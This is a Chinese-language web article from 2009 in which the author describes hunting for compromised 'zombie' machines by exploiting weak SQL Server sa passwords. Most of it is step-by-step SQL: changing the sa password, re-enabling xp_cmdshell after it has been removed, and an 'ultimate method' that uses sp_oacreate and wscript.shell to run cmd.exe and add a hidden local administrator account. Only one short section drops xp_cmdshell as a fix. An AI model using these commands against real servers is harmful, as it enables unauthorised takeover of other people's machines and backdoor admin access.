打印本文 打印本文  关闭窗口 关闭窗口  
用SQL分离器实现sa弱口令强行入侵
作者:陈鹏  文章来源:eNet  点击数  更新时间:2009/9/11 23:33:00  文章录入:陈鹏  责任编辑:陈鹏

我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。

下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。

注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。

一.更改sa口令方法:

用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)

二.简单修补sa弱口令:

方法1:查询分离器连接后执行:

if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO

然后按F5键命令执行完毕。

方法2:查询分离器连接后

第一步执行:use master,

第二步执行:sp_dropextendedproc 'xp_cmdshell',

然后按F5键命令执行完毕。

三.常见情况恢复执行xp_cmdshell:

1 未能找到存储过程'master..xpcmdshell'。

恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,

第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',

然后按F5键命令执行完毕。

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

恢复方法:查询分离器连接后,

第一步执行:sp_dropextendedproc "xp_cmdshell",

第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

然后按F5键命令执行完毕。

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

恢复方法:查询分离器连接后,

第一步执行:exec sp_dropextendedproc 'xp_cmdshell'

第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5键命令执行完毕。

四.终极方法:

如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

打印本文 打印本文  关闭窗口 关闭窗口